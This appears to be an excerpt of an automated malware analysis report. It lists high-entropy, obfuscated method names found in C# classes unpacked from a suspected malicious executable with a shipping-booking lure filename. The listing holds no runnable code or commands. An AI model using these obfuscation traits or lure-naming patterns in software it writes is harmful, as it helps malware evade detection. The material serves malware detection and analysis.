Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, XuBBOyqZHedkChRurO.cs	High entropy of concatenated method names: 'duSZ0GBT1D', 'iJGZutdYTH', 'ptPZ2fx5xB', 'OhDZFgbBsy', 'dFfZoBbnkq', 'KmkZKFCRM7', 'OlNZwmNXfX', 'BH8Zf9IIul', 'BSgZElJexP', 'BymZIUuR4l'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, lLoOpbp98ceyYJEt7Q.cs	High entropy of concatenated method names: 'pxi3SRTcJ', 'xcMTrMTOZ', 'euJeBDWTj', 'Y6vOr9khC', 'XNhuUc6bP', 'GRWUZv07X', 'iixiONekonRbkIQxVT', 'ihPe84nADxxKEbGbXg', 'UARjNKU6L', 'mXF7Q1IVP'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, e3Vm7DUU0l9H9RyBUx.cs	High entropy of concatenated method names: 'oK2y1fDchN', 'iUNyOmcmnB', 'KcYlHMyR7P', 'uVglov0tav', 'gi6lKV6IlJ', 'oKPlMFSgMN', 'XM4lwp20dw', 'iwOlfuQ01L', 'sJ9ld0sZ3e', 'gpPlEkhZtt'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, kE2Srp2ld2AAdsRnJr.cs	High entropy of concatenated method names: 'OWCPN762bO', 'rfsPcVOtoL', 'DUZPybZDkG', 'RinPXRX6cn', 'BmyP4ZnOcj', 'GBtyClx496', 'KltyYkQ4I0', 'LTBytFXYTN', 'dDByhE5uQN', 'y3WyLnVSG9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, hM4Gbid7ianNtZiD8K.cs	High entropy of concatenated method names: 'GWlX9jiZYI', 'x1uXsJZ3yp', 'S4UX30AIGf', 'CQpXTyxe8n', 'v3nX13WmcB', 'C7mXecGXau', 'RsdXOivEio', 'aw3X0WNi6C', 'tsqXuHR1QM', 'W3BXUNQre5'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, HxNAiq5aRigM2OIS7K0.cs	High entropy of concatenated method names: 'UAJQ9gZTL6', 'pioQsNanLE', 'ySeQ3i7UCj', 'abVQTZryRI', 'akMQ1SRZik', 'WmQQeVHrQw', 'HXXQO69q4b', 'reUQ03pLg6', 'e7bQu0NlIW', 'Oo0QUbn27e'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, KaR3uUBI0MjM3PHugT.cs	High entropy of concatenated method names: 'oCAQ5sPUBr', 'ayiQVcftou', 'kujQrS3tXd', 'xq0QSLdNwT', 'h6oQcXDOcu', 'gERQyIlHPv', 'uKyQPHodAF', 'xJHjtydHWm', 'Lf2jhp2moM', 'oZKjLmI9Lk'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, EJxCOd0IK9HWBTygqT.cs	High entropy of concatenated method names: 'YOxcboSUkO', 'SCvcxf2s3i', 'vM7cimoL8W', 'wIPcW4K0cN', 'EHrcCNbSt0', 'KqxcYB1R5j', 'mxOcttvlma', 'SZ5chGX3AD', 'CXhcLBDlIe', 'wT0cB2A0t4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, hSfCAGu12LdJc86UdL.cs	High entropy of concatenated method names: 'RbalTHaF87', 'BebleRZGyl', 'I4hl06a9lo', 'vw0luP5ZtK', 'xkVlJOKvRh', 'FoElm8ZPvh', 'zZrlAcjos4', 'KhQljFdkPG', 'PCalQqeZQf', 'yeil7ID6qX'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UYrVFP5VpNDvklhDEYZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Re77bBab9i', 'qj07x5QNvN', 'RGB7iWxWXn', 'Ixh7WggVY8', 'jew7CTFG3y', 'SVp7YoyEs5', 'txW7t7horV'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, NRj2udzPuinToaZAkR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvFQZovY2u', 'XYhQJ8hbbD', 'gNLQmXuctj', 'WOvQAjEgTa', 'sAQQj2U3sT', 'pjlQQlBdyX', 'KhGQ7Gb740'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, m1JhKuWAltth18afAA.cs	High entropy of concatenated method names: 'UhRAn6RCGf', 'u5JAvpuvAe', 'ToString', 'IhRASYpXwi', 'SLhAcuA29b', 'IifAlBmCbM', 'uJTAysBLEn', 'oxiAPE0BpS', 'IxEAXPnqC1', 'eOaA4pfacg'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, ErbZs0FKsqSRkoQOs9.cs	High entropy of concatenated method names: 'vEd70HmxuMqKWpebZi6', 'UfrJN8myxn22E0b4uwT', 'o3PUnkm6FfrAtReSwod', 'AB8Pjk2GPn', 'Ur4PQOHVWY', 'mWAP7E5Wmb', 'Rrg8GDm059NPq54hnoF', 'XVZy9PmjmWiiwNjSoXL'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, Jit5a6i5l2yO4HDS69.cs	High entropy of concatenated method names: 'ToString', 'iKZmI3tE7S', 'jLAmFicqCj', 'OeXmHbErlc', 'HhnmoLn7q3', 'bDkmKn6Uhl', 'iugmMkRxtE', 'tQ0mwedx4v', 'swBmf2pBn7', 'P57mdGEIFD'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, OUgrSjc9E7Xf2gdhkq.cs	High entropy of concatenated method names: 'Dispose', 'raM5L8Y5vV', 'SQ9pFXBOIM', 'muCmmrUARs', 'ego5BXfnv2', 'woI5z1vR9v', 'ProcessDialogKey', 'jEJpaHQHnP', 'nW5p5hfyC1', 'CKpppwaR3u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, kLsM8MYfJ8Mq09ivr4.cs	High entropy of concatenated method names: 'ssaAhwijh3', 'cvtABMfYQG', 'oM5ja6USSK', 'c5pj5rouXP', 'tHSAIRUPlT', 'ErMAR9nmyZ', 'A34Aq2HZc4', 'LovAbPFIdy', 'kNDAxUxIBm', 'DbdAicJ4ob'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, oHQHnPLvW5hfyC1eKp.cs	High entropy of concatenated method names: 'SBSj2iym1b', 'Aa9jFE5Fp7', 'TmcjHuT6f7', 'G0Ajon8F75', 'DMxjbUhxuR', 'rg8jK8fouM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, toXfnvh26oI1vR9vXE.cs	High entropy of concatenated method names: 'E1ejSXZ3cF', 'lTcjcBfF7Q', 'RhPjlLOcgZ', 'xSejyiGTyh', 'SvSjPWMKh6', 'AghjXmCJ1V', 'Wm5j47rPuG', 'HIAjkiSyoi', 'ThBjnpDkGK', 'VNDjvTmWas'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	High entropy of concatenated method names: 'igfVN8Y1LQ', 'NxBVSWcsyl', 'H1pVcbu3yZ', 'u4AVl4Xx1J', 'miiVyQn0Hr', 'BIdVP8BgwE', 'i7NVXKF4lf', 'RevV4MmKuj', 'Mo8VkkDvUw', 'Kg4VnbhPC9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, b6FpHuraoQLlIMotTo.cs	High entropy of concatenated method names: 'Vyu5XJxCOd', 'OK954HWBTy', 'w125nLdJc8', 'wUd5vLN3Vm', 'PyB5JUx4E2', 'frp5mld2AA', 'Xtekrbic51NgvwMxTI', 'lP60E7kFUtIOAdPDfa', 'X6O7h6JE6yC97g6pit', 'xaZ55yketZ'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, XuBBOyqZHedkChRurO.cs	High entropy of concatenated method names: 'duSZ0GBT1D', 'iJGZutdYTH', 'ptPZ2fx5xB', 'OhDZFgbBsy', 'dFfZoBbnkq', 'KmkZKFCRM7', 'OlNZwmNXfX', 'BH8Zf9IIul', 'BSgZElJexP', 'BymZIUuR4l'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, lLoOpbp98ceyYJEt7Q.cs	High entropy of concatenated method names: 'pxi3SRTcJ', 'xcMTrMTOZ', 'euJeBDWTj', 'Y6vOr9khC', 'XNhuUc6bP', 'GRWUZv07X', 'iixiONekonRbkIQxVT', 'ihPe84nADxxKEbGbXg', 'UARjNKU6L', 'mXF7Q1IVP'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, e3Vm7DUU0l9H9RyBUx.cs	High entropy of concatenated method names: 'oK2y1fDchN', 'iUNyOmcmnB', 'KcYlHMyR7P', 'uVglov0tav', 'gi6lKV6IlJ', 'oKPlMFSgMN', 'XM4lwp20dw', 'iwOlfuQ01L', 'sJ9ld0sZ3e', 'gpPlEkhZtt'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, kE2Srp2ld2AAdsRnJr.cs	High entropy of concatenated method names: 'OWCPN762bO', 'rfsPcVOtoL', 'DUZPybZDkG', 'RinPXRX6cn', 'BmyP4ZnOcj', 'GBtyClx496', 'KltyYkQ4I0', 'LTBytFXYTN', 'dDByhE5uQN', 'y3WyLnVSG9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, hM4Gbid7ianNtZiD8K.cs	High entropy of concatenated method names: 'GWlX9jiZYI', 'x1uXsJZ3yp', 'S4UX30AIGf', 'CQpXTyxe8n', 'v3nX13WmcB', 'C7mXecGXau', 'RsdXOivEio', 'aw3X0WNi6C', 'tsqXuHR1QM', 'W3BXUNQre5'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, HxNAiq5aRigM2OIS7K0.cs	High entropy of concatenated method names: 'UAJQ9gZTL6', 'pioQsNanLE', 'ySeQ3i7UCj', 'abVQTZryRI', 'akMQ1SRZik', 'WmQQeVHrQw', 'HXXQO69q4b', 'reUQ03pLg6', 'e7bQu0NlIW', 'Oo0QUbn27e'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, KaR3uUBI0MjM3PHugT.cs	High entropy of concatenated method names: 'oCAQ5sPUBr', 'ayiQVcftou', 'kujQrS3tXd', 'xq0QSLdNwT', 'h6oQcXDOcu', 'gERQyIlHPv', 'uKyQPHodAF', 'xJHjtydHWm', 'Lf2jhp2moM', 'oZKjLmI9Lk'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, EJxCOd0IK9HWBTygqT.cs	High entropy of concatenated method names: 'YOxcboSUkO', 'SCvcxf2s3i', 'vM7cimoL8W', 'wIPcW4K0cN', 'EHrcCNbSt0', 'KqxcYB1R5j', 'mxOcttvlma', 'SZ5chGX3AD', 'CXhcLBDlIe', 'wT0cB2A0t4'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, hSfCAGu12LdJc86UdL.cs	High entropy of concatenated method names: 'RbalTHaF87', 'BebleRZGyl', 'I4hl06a9lo', 'vw0luP5ZtK', 'xkVlJOKvRh', 'FoElm8ZPvh', 'zZrlAcjos4', 'KhQljFdkPG', 'PCalQqeZQf', 'yeil7ID6qX'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UYrVFP5VpNDvklhDEYZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Re77bBab9i', 'qj07x5QNvN', 'RGB7iWxWXn', 'Ixh7WggVY8', 'jew7CTFG3y', 'SVp7YoyEs5', 'txW7t7horV'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, NRj2udzPuinToaZAkR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvFQZovY2u', 'XYhQJ8hbbD', 'gNLQmXuctj', 'WOvQAjEgTa', 'sAQQj2U3sT', 'pjlQQlBdyX', 'KhGQ7Gb740'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, m1JhKuWAltth18afAA.cs	High entropy of concatenated method names: 'UhRAn6RCGf', 'u5JAvpuvAe', 'ToString', 'IhRASYpXwi', 'SLhAcuA29b', 'IifAlBmCbM', 'uJTAysBLEn', 'oxiAPE0BpS', 'IxEAXPnqC1', 'eOaA4pfacg'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, ErbZs0FKsqSRkoQOs9.cs	High entropy of concatenated method names: 'vEd70HmxuMqKWpebZi6', 'UfrJN8myxn22E0b4uwT', 'o3PUnkm6FfrAtReSwod', 'AB8Pjk2GPn', 'Ur4PQOHVWY', 'mWAP7E5Wmb', 'Rrg8GDm059NPq54hnoF', 'XVZy9PmjmWiiwNjSoXL'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, Jit5a6i5l2yO4HDS69.cs	High entropy of concatenated method names: 'ToString', 'iKZmI3tE7S', 'jLAmFicqCj', 'OeXmHbErlc', 'HhnmoLn7q3', 'bDkmKn6Uhl', 'iugmMkRxtE', 'tQ0mwedx4v', 'swBmf2pBn7', 'P57mdGEIFD'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, OUgrSjc9E7Xf2gdhkq.cs	High entropy of concatenated method names: 'Dispose', 'raM5L8Y5vV', 'SQ9pFXBOIM', 'muCmmrUARs', 'ego5BXfnv2', 'woI5z1vR9v', 'ProcessDialogKey', 'jEJpaHQHnP', 'nW5p5hfyC1', 'CKpppwaR3u'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, kLsM8MYfJ8Mq09ivr4.cs	High entropy of concatenated method names: 'ssaAhwijh3', 'cvtABMfYQG', 'oM5ja6USSK', 'c5pj5rouXP', 'tHSAIRUPlT', 'ErMAR9nmyZ', 'A34Aq2HZc4', 'LovAbPFIdy', 'kNDAxUxIBm', 'DbdAicJ4ob'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, oHQHnPLvW5hfyC1eKp.cs	High entropy of concatenated method names: 'SBSj2iym1b', 'Aa9jFE5Fp7', 'TmcjHuT6f7', 'G0Ajon8F75', 'DMxjbUhxuR', 'rg8jK8fouM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, toXfnvh26oI1vR9vXE.cs	High entropy of concatenated method names: 'E1ejSXZ3cF', 'lTcjcBfF7Q', 'RhPjlLOcgZ', 'xSejyiGTyh', 'SvSjPWMKh6', 'AghjXmCJ1V', 'Wm5j47rPuG', 'HIAjkiSyoi', 'ThBjnpDkGK', 'VNDjvTmWas'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	High entropy of concatenated method names: 'igfVN8Y1LQ', 'NxBVSWcsyl', 'H1pVcbu3yZ', 'u4AVl4Xx1J', 'miiVyQn0Hr', 'BIdVP8BgwE', 'i7NVXKF4lf', 'RevV4MmKuj', 'Mo8VkkDvUw', 'Kg4VnbhPC9'
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, b6FpHuraoQLlIMotTo.cs	High entropy of concatenated method names: 'Vyu5XJxCOd', 'OK954HWBTy', 'w125nLdJc8', 'wUd5vLN3Vm', 'PyB5JUx4E2', 'frp5mld2AA', 'Xtekrbic51NgvwMxTI', 'lP60E7kFUtIOAdPDfa', 'X6O7h6JE6yC97g6pit', 'xaZ55yketZ'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
